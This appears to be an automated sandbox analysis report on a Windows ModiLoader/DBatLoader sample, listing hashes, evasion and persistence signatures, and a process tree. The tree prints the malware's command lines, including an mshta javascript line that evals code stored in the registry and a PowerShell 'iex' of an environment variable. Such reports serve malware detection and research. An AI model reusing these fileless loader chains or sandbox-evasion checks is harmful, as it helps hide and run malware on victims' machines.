Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
16-05-2024 05:42
General
-
Target
49a18b85968649d12b80ad3addadbf63_JaffaCakes118.exe
-
Size
355KB
-
MD5
49a18b85968649d12b80ad3addadbf63
-
SHA1
b7cf30cfa839ebf74f299aeaf1d256605c02c4e7
-
SHA256
1c886653f24c734aaa232332ef9f2f55fbcb6314cfe75972f38a7a6037610366
-
SHA512
10b255e8bd4361a910c77073ee7d2a2f9ac5c3c8f2e057bdac87d5a2118ebd3e9c736d35a757163eb50daadc5d67546d47ba462668b9c6bc64bda14cdf09a4bb
-
SSDEEP
6144:rl8krvwf9ocqugSHDV7wv5jmkXszdwoNC/NsHjGjDpSqLkl/Pi:rqkrw9BWSHDV7whjPspwoNNHjGvp9L7
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 56 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\49a18b85968649d12b80ad3addadbf63_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\49a18b85968649d12b80ad3addadbf63_JaffaCakes118.exe"1⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:EK9kCdz="e6P5SbjZ";h2c=new%20ActiveXObject("WScript.Shell");EDqqa8="u0PLlx";JhiZ26=h2c.RegRead("HKCU\\software\\PqDLGTgKU\\VHi3K4dBZ");vAJ4pat9="Pjvv";eval(JhiZ26);ZxqN7Nk="uxpb";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:yipvjs2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
69B
MD5079d67095185dd90232481e93bf6d285
SHA18d7e8dcac18b7ce6ae1bb2f02405ee128bafc30d
SHA256294ff8d3fb576e63e2c5e952e6fdeb2dd662d92c356752cb75e50438543d724e
SHA512fa369a10f07211be94e8c025214fe4a419a3338b21447b8ba68c49ba156e2d6f472623b9e53776eedb4f35b73f549fd707989d26aad7d4631f2ceff1b6ec6007
-
Filesize
27KB
MD5919341d99690e3c52c28c344d00b3eb4
SHA1ea09bccf3c18b934ce57a384baaa5dc0d9883ecf
SHA2566d95f084cc7fd35a52ec6c8c0c833ddcc2d7eb3ef331e646d76056f4940932b5
SHA51204cc5a179a1a3ec48c71f83bfd59a78430304f6e1b151d926544c7276d8115126b4944fde1d4e376c9e20b5f2e4c72a57dff18f5c6db57933c7a515fc0037697
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
8KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
382KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
8KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
382KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB